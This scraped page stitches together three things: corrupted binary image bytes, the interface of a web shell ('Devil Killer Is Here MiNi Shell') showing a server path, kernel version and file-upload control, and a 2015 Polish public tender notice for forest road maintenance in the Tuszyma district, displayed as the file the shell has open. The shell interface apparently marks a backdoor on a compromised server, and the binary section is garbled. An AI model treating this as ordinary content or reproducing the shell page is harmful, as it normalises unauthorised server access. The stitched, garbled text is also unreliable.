JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150805/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150805/199004-N-2015.html

<p class="kh_header"><b>Tuszyma: Utrzymanie dróg leśnych na terenie Nadleśnictwa Tuszyma w 2015 roku</b><br>
<b>Numer ogłoszenia: 199004 - 2015; data zamieszczenia: 05.08.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Nadleśnictwo Tuszyma , Tuszyma 147, 39-321 Tuszyma, tel. (0-17) 5813111.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.krosno.lasy.gov.pl/web/tuszyma</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Państwowe Gospodarstwo Leśne Lasy Państwowe.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Utrzymanie dróg leśnych na terenie Nadleśnictwa Tuszyma w 2015 roku.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem niniejszego zamówienia jest:
Część  1 zamówienia: Bieżące utrzymanie dróg leśnych w Leśnictwach: Przecław, Przyłęk, Wojsław, Niwiska, Kamionka, Szkółkarskie Przecław obejmujące:
1.	Leśnictwo Przecław:
Remont drogi leśnej w oddz. 107 b o długości 140 m, szer. 3,5m polegający na:
- karczowaniu pni o średnicy 46-55 cm w gruntach kat. III-IV w ilości 10 szt.
- wyprofilowaniu i zagęszczeniu podłoża pod warstwy konstrukcyjne nawierzchni,
- wykonaniu nawierzchni z tłucznia 31,5 -63 mm z zaklinowaniem klińcem 4-31,5 mm, zagęszczeniem i zamiałowaniem o grubości warstwy po zagęszczeniu 15 cm,
- wykonaniu placu manewrowego o wym. 30x10 m poprzez wyprofilowanie i zagęszczenie podłoża oraz wykonanie nawierzchni jw.
2.   Leśnictwo Wojsław:
1) Remont drogi leśnej w oddziale 11 a  o długości 100m, szer. 3,5 m polegający na:
- wyprofilowaniu i zagęszczeniu podłoża pod warstwy konstrukcyjne nawierzchni drogi,
- wykonaniu nawierzchni z tłucznia 31,5 -63 mm z zaklinowaniem klińcem 4-31,5 mm, zagęszczeniem i zamiałowaniem o grubości warstwy po zagęszczeniu 15 cm.
2) Remont drogi leśnej w oddz. 53d o długości 120 m, szer. 4m polegający na:
- karczowaniu pni o średnicy 46-55 cm w gruntach kat. III-IV w ilości 25 szt.,
- usunięciu warstwy ziemi urodzajnej - humusu gr 15 cm na powierzchni 480m2,
- dowiezieniu piasku w ilości ok. 160 m3, rozłożeniu na powierzchni 320 m2 (80x4m) - średnia grubość warstwy piasku 0,5 m,
- profilowaniu i zagęszczenie podłoża pod warstwy konstrukcyjne nawierzchni drogi,
- wykonanie nawierzchni z tłucznia 31,5 -63 mm z zaklinowaniem klińcem 4-31,5 mm, zagęszczeniem i zamiałowaniem o grubości warstwy po zagęszczeniu 25 cm.

3. Leśnictwo Szkółkarskie Przecław:
Remont drogi leśnej Telefoniczna na długości 250 m, szer. 3,5 m polegający na:
- karczowaniu pni o średnicy 46-55 cm koparką podsiębierną w gruntach kat. III-IV w ilości 23 szt.
- wyprofilowaniu i zagęszczeniu podłoża pod warstwy konstrukcyjne nawierzchni drogi,
- wykonanie nawierzchni z tłucznia 31,5 -63 mm z zaklinowaniem klińcem 4-31,5 mm, zagęszczeniem i zamiałowaniem o grubości warstwy po zagęszczeniu 15 cm,
- utwardzenie nawierzchni placu składowego o wym. 20x10m  poprzez wyprofilowanie i zagęszczenie podłoża oraz wykonanie nawierzchni jw.
- wykonanie rowu odwadniającego na długości 20 m.

4. Leśnictwo Kamionka:
Remont drogi leśnej w oddz. 179-280 o długości 680 m i szer. 3,5 m polegający na:
- wyprofilowaniu i zagęszczeniu podłoża pod warstwy konstrukcyjne nawierzchni drogi,
- wykonanie nawierzchni z tłucznia 31,5 -63 mm z zaklinowaniem klińcem 4-31,5 mm, zagęszczeniem i zamiałowaniem o grubości warstwy po zagęszczeniu 15 cm,
- wykonanie rowu odwadniającego na długości 150 m.

5. Leśnictwo Przyłęk:
Remont drogi leśnej Madziarka o długości 4300 m i szer. 3,5 m polegający na:
- miejscowym zebraniu poboczy koparką na długości 2000 mb. Szerokość poboczy 0,75 m.
- wyprofilowaniu na mokro istniejącej nawierzchni tłuczniowej równiarką,
- miejscowym doziarnieniu wyprofilowanej nawierzchni klińcem 4-31,5mm, średnia grubość warstwy 5 cm na długości 1200 m,
- zagęszczeniu i zamiałowaniu nawierzchni.

6. Leśnictwo Niwiska:
1) Remont drogi leśnej Niwiska-Jeziórko o długości 1964 m i szer. 3,5 m polegający na:
- wyprofilowaniu na mokro istniejącej nawierzchni tłuczniowej równiarką,
- zagęszczeniu i zamiałowaniu wyprofilowanej nawierzchni,
- utwardzenie nawierzchni zjazdu o wym. 10x15 m  poprzez wyprofilowanie i zagęszczenie podłoża oraz wykonanie nawierzchni z tłucznia 31,5 -63 mm z zaklinowaniem klińcem 4-31,5 mm, zagęszczeniem i zamiałowaniem o grubości warstwy po zagęszczeniu 15 cm.
2) Remont drogi leśnej Skośna o długości 1952 m i szer. 3,5 m polegający na:
- wyprofilowaniu na mokro istniejącej nawierzchni tłuczniowej równiarką,
- zagęszczeniu i zamiałowaniu wyprofilowanej nawierzchni.

Część 2 zamówienia: Konserwacja odcinka drogi leśnej Przecław-Szkółki o długości 350 mb, szer. 3.5m w Leśnictwie Szkółkarskim Przecław polegająca na podwójnym powierzchniowym utrwaleniu istniejącej nawierzchni przy użyciu emulsji asfaltowej i grysów frakcji 8-12 (pierwsza warstwa)  i 2-5 mm (druga warstwa).
Szczegółowy opis przedmiotu zamówienia obejmujący przewidywany do wykonania zakres robót zawiera Rozdział II SIWZ oraz Przedmiary robót (Załącznik nr 1 do OPZ). Z uwagi na ryczałtowy charakter umownego wynagrodzenia załączony Przedmiar robót stanowi element pomocniczy przy kalkulacji ceny ofertowej. Roboty muszą być wykonane zgodnie z SIWZ, zasadami aktualnej wiedzy technicznej, obowiązującymi przepisami i normami. W związku z powyższym, Wykonawca nie może żądać wynagrodzenia za prace nie ujęte w Przedmiarze robót, a wykonane w trakcie realizacji przedmiotu zamówienia nawet wtedy, gdyby w czasie zawierania umowy w ogóle nie można było przewidzieć rozmiaru lub kosztów prac. Zamawiający zorganizuje w dniu 11.08.2015 r. (wtorek) o godz. 09:00 w miejscu Nadleśnictwie Tuszyma wizję lokalną w celu zobrazowania przedmiotu zamówienia. Wizja nie jest obowiązkowa. Podczas wizji Zamawiający nie będzie udzielał żadnych dodatkowych wyjaśnień, wszelkie pytania należy kierować do Zamawiającego w trybie art. 38 Ustawy..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>V</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających:</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li>Zamawiający, w stosunku do zamówień określonych w częściach 1-2, przewiduje możliwość udzielania zamówień uzupełniających, o których mowa w art. 67 ust. 1 pkt. 6 ustawy, w wysokości nie przekraczającej 50 % wartości zamówienia podstawowego liczonych odrębnie dla każdej części.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.40-2, 45.23.32.20-7, 45.23.31.42-6, 45.23.31.41-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Wykonawca składający ofertę jest zobowiązany do wniesienia wadium w wysokości :

Część 1 zamówienia  -  3 500,00 PLN (słownie złotych: trzy tysiące pięćset złotych  00/100),

Część 2 zamówienia -  500,00 PLN (słownie złotych:  pięćset złotych 00/100), 

2. Wadium musi być wniesione przed upływem terminu składania ofert w jednej lub kilku spośród następujących form, w zależności od wyboru Wykonawcy:
1)	pieniądzu, przelewem na rachunek bankowy Zamawiającego w PKO BP O/Mielec na numer konta 10 1020 4913 0000 9402 0010 3580. W przypadku wnoszenia wadium w formie pieniężnej, za skuteczne jego wniesienie należy uznać sytuację, kiedy uznanie na rachunku bankowym Zamawiającego następuje przed upływem terminu składania ofert. 
2)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że zobowiązanie kasy jest zawsze zobowiązaniem pieniężnym;
3)	gwarancjach bankowych;
4)	gwarancjach ubezpieczeniowych;
5)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007 r. Nr 42, poz. 275).
3. Wadium musi obejmować cały okres związania ofertą, tj. począwszy od dnia, w którym upływa termin składania ofert do co najmniej ostatniego dnia związania ofertą włącznie.
4. Wadium wniesione w pieniądzu Zamawiający przechowuje na rachunku bankowym. 
5. W przypadku, gdy wadium wnoszone jest w innej formie niż pieniądz, Wykonawca powinien załączyć do oferty oryginał gwarancji lub poręczenia w sposób umożliwiający ich zwrot zgodnie z Ustawą (np. w oddzielnej kopercie dołączonej od oferty). Z treści gwarancji powinno wynikać, że gwarant zobowiązuje się do zapłaty kwoty wadium bezwarunkowo, nieodwołalnie i na pierwsze pisemne żądanie beneficjenta (zamawiającego). Treść gwarancji musi przesądzać o tym, że zamawiający nie może mieć żadnych trudności z uzyskaniem od gwaranta kwoty wadium, jeżeli tylko spełni warunki formalne związane z żądaniem zapłaty kwoty wadium. 
Złożenie gwarancji wadialnej, w której gwarant nie zobowiązuje się jednoznacznie do zapłaty kwoty wadium w każdym przypadku określonym w Ustawie, będzie skutkować wykluczeniem wykonawcy z postępowania.
W przypadku gdy Wykonawca zamierza złożyć ofertę na więcej niż jedną część zamówienia gwarancję wadialną należy złożyć dla każdej części zamówienia oddzielnie.
6. W razie wnoszenia wadium w formie pieniężnej w tytule przelewu należy umieścić następującą informację: - nr postępowania: SA.270.1.6.2015, wadium na część(i) (należy podać numer(y) części zamówienia).
7. Wykonawca, który nie wniesie wadium w wysokości określonej w pkt 10.1., w formie lub formach, o których mowa w pkt 10.2., zostanie wykluczony z postępowania.
8. Zamawiający zwróci wadium wszystkim Wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, z zastrzeżeniem pkt 10.13.
9. Wykonawcy, którego oferta zostanie wybrana jako najkorzystniejsza, Zamawiający zwróci wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego oraz wniesieniu zabezpieczenia należytego wykonania umowy.
10. Zamawiający zwróci niezwłocznie wadium, na wniosek Wykonawcy, który wycofał ofertę przed upływem terminu składania ofert.
11. Zamawiający żądać będzie ponownego wniesienia wadium przez Wykonawcę, któremu zwrócono wadium na podstawie pkt 10.8., jeżeli w wyniku rozstrzygnięcia odwołania jego oferta została wybrana jako najkorzystniejsza. Wykonawca winien wnieść wadium w terminie określonym przez Zamawiającego.
12. Jeżeli wadium wniesiono w pieniądzu Zamawiający zwróci je wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez Wykonawcę.
13. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 ustawy, z przyczyn leżących po jego stronie, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1, pełnomocnictw, listy podmiotów należących do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 2 pkt 5, lub informacji o tym, że nie należy do grupy kapitałowej, lub nie wyraził zgody na poprawienie omyłki, o której mowa w art. 87 ust. 2 pkt 3, co powodowało brak możliwości wybrania oferty złożonej przez wykonawcę jako najkorzystniejszej.
14. Wykonawca, którego oferta zostanie wybrana utraci wadium wraz z odsetkami na rzecz Zamawiającego w przypadku, gdy:
1)	odmówi podpisania umowy w sprawie niniejszego zamówienia na warunkach określonych w ofercie;
2)	nie wniesie wymaganego zabezpieczenia należytego wykonania umowy;
3)	zawarcie umowy w sprawie niniejszego zamówienia stanie się niemożliwe z przyczyn leżących po stronie Wykonawcy.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie wymaga się.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki udziału w postępowaniu, o których mowa w art. 22 ust. 1 Ustawy w zakresie określonym przez Zamawiającego w niniejszym postępowaniu, tj. warunki dotyczące: - posiadania wiedzy i doświadczenia. Wykonawcy zobowiązani są wykazać, że wykonali w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie co najmniej 2 roboty budowlane polegające na wykonaniu prac z zakresu utrzymania dróg o charakterze zbliżonym do przedmiotu niniejszego zamówienia o wartości nie mniejszej niż: 
dla części 1 zamówienia 100 000,00 PLN brutto,
dla części 2 zamówienia  30 000,00 PLN brutto.
W przypadku złożenia oferty na więcej niż jedną część zamówienia Wykonawca musi spełnić warunek przynajmniej dla jednej części o najwyższych wymaganiach co do wartości wykonanych robót. 
Ocena spełniania warunku zostanie dokonana na podstawie informacji i danych zawartych w załączonych do oferty dokumentach i poświadczeniach.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki udziału w postępowaniu, o których mowa w art. 22 ust. 1 Ustawy w zakresie określonym przez Zamawiającego w niniejszym postępowaniu, tj. warunki dotyczące: - dysponowania potencjałem technicznym. Wykonawcy zobowiązani są wykazać, że dysponują (lub będą dysponować) co najmniej następującymi maszynami, urządzeniami i pojazdami:
Dla części 1 zamówienia:
2 szt. - samochód ciężarowy - wywrotka o ładowności co najmniej  16 ton,
1 szt. - koparka o poj. łyżki co najmniej 0,6m3, 
1 szt. - równiarka,
1 szt. - spycharka 
1 szt. - walec wibracyjny o masie co najmniej 8 ton, 
1 szt. - walec statyczny o masie co najmniej 8 ton,
1 szt. - walec ogumiony,
1 szt. -  rozściełacz do kruszyw,
1 szt. - przewoźny zbiornik wody z urządzeniem zraszającym
Dla części 2 zamówienia:
2 szt. - samochód ciężarowy - wywrotka o ładowności co najmniej  16 ton,
1 szt. - równiarka,
1 szt. - walec statyczny o masie co najmniej 8 ton,
1 szt. - szczotka mechaniczna,
1 szt. - walec ogumiony,
1 szt. - kombajn do powierzchniowych utrwaleń lub urządzenia alternatywne w postaci skrapiarki lepiszcza 1 szt.  i rozsypywarki kruszywa 1 szt.,
W przypadku złożenia oferty na część 1 i 2 zamówienia uznaje się, że potencjał techniczny w postaci: samochodów ciężarowych (2 szt.), równiarki (1 szt.), walca statycznego (1 szt.) oraz walca ogumionego (1 szt.) jest wystarczający do wykonania obydwu części zamówienia.
Ocena spełniania warunku zostanie dokonana na podstawie informacji i danych zawartych w załączonych do oferty dokumentach i poświadczeniach.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki udziału w postępowaniu, o których mowa w art. 22 ust. 1 Ustawy w zakresie określonym przez Zamawiającego w niniejszym postępowaniu, tj. warunki dotyczące:- dysponowania osobami zdolnymi do wykonania zamówienia. Wykonawcy są zobowiązani wykazać, że dysponują (lub będą dysponować) co najmniej:
Dla części 1 zamówienia:
1) 1 osobą posiadającą uprawnienia budowlane bez ograniczeń w specjalności konstrukcyjno - budowlanej -drogowej zgodnie z art. 14 ust. 1 pkt 2a ustawy z dnia 7 lipca 1994 roku Prawo Budowlane
2) wykwalifikowanymi pracownikami posiadającymi uprawnienia do wykonywania prac objętych zamówieniem w zakresie:
-  kierowcy samochodów ciężarowych - co najmniej 2 osoby;
- operator koparki lub koparko - ładowarki - co najmniej 1 osoba,
- operator równiarki - co najmniej 1 osoba; 	
- operator walca- co najmniej 1 osoba;  
- operator  rozściełacza do kruszyw - co najmniej  1 osoba;  
Dla części 2  zamówienia:
1) 1 osobą posiadającą uprawnienia budowlane bez ograniczeń w specjalności konstrukcyjno - budowlanej - drogowej zgodnie z art. 14 ust. 1 pkt 2a ustawy z dnia 7 lipca 1994 roku Prawo Budowlane
2) wykwalifikowanymi pracownikami posiadającymi uprawnienia do wykonywania prac objętych zamówieniem w zakresie:
- kierowcy samochodów ciężarowych - co najmniej 2 osoby,
- operator równiarki - co najmniej 1 osoba,
- operator szczotki mechanicznej -  co najmniej 1 osoba,  
- operator walca - co najmniej 1 osoba, 
- operator kombajnu do powierzchniowych utrwaleń - co najmniej 1 osoba lub operator skrapiarki lepiszcza -  1 osoba i  rozsypywarki kruszywa -  1 osoba,
Wykonawca nie może przedstawić (w zakresie określonym powyżej) tych samych osób do wykonywania kilku prac. Każda osoba może być wskazana tylko przy jednym rodzaju prac. 
W przypadku złożenia oferty na część 1 i 2 zamówienia uznaje się, że potencjał osobowy w postaci: osoby z uprawnieniami budowlanymi, kierowców samochodów ciężarowych, operator walca oraz operator równiarki jest wystarczający do wykonania obydwu części zamówienia.
Przez uprawnienia budowlane rozumie się uprawnienia do sprawowania samodzielnych funkcji technicznych w budownictwie, wydane na podstawie ustawy Prawo budowlane (j.t. Dz. U. z 2010 r. Nr 243, poz. 1623, ze zm.) oraz rozporządzenia Ministra Transportu i Budownictwa w sprawie samodzielnych funkcji technicznych w budownictwie (Dz. U. z 2006 r. Nr 83, poz. 578, ze zm.) lub odpowiadające im inne ważne uprawnienia budowlane wydane na mocy wcześniej obowiązujących przepisów i nadające takie same uprawnienia jak określone w pkt 6.2.2. ppkt. 1).
W przypadku obywateli państw Europejskiego Obszaru Gospodarczego oraz Konfederacji Szwajcarskiej, a także innych - muszą oni spełniać wymogi określone w art. 12a ustawy Prawo budowlane, z których wynika, że samodzielne funkcje techniczne w budownictwie mogą również wykonywać osoby, których odpowiednie kwalifikacje zawodowe zostały uznane na zasadach określonych w przepisach ustawy o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U. z 2008 r. Nr 63, poz. 394).
Ocena spełniania warunku zostanie dokonana na podstawie informacji i danych zawartych w załączonych do oferty dokumentach i poświadczeniach.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki udziału w postępowaniu, o których mowa w art. 22 ust. 1 Ustawy w zakresie określonym przez Zamawiającego w niniejszym postępowaniu, tj. warunki dotyczące: - sytuacji finansowej: Wykonawcy zobowiązani są wykazać, że posiadają środki finansowe lub zdolność kredytową na kwotę nie mniejszą niż:
dla części nr 1 zamówienia - 100 000,00 PLN
dla części nr 2 zamówienia - 30 000,00 PLN
W przypadku złożenia oferty na więcej niż jedną część zamówienia Wykonawca musi spełnić warunek przynajmniej dla jednej  części zamówienia o najwyższych wymaganiach co do ilości posiadanych środków finansowych lub zdolności kredytowej; ; - sytuacji ekonomicznej: Wykonawcy zobowiązani są wykazać, że posiadają ubezpieczenie odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia, na kwotę nie mniejszą niż:
dla części nr 1 zamówienia - 100 000,00 PLN
dla części nr 2 zamówienia - 30 000,00 PLN
W przypadku złożenia oferty na więcej niż jedną część zamówienia Wykonawca musi spełnić warunek przynajmniej dla jednej  części zamówienia o najwyższych wymaganiach co do ubezpieczenia odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.
Ocena spełniania warunku zostanie dokonana na podstawie informacji i danych zawartych w załączonych do oferty dokumentach i poświadczeniach.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

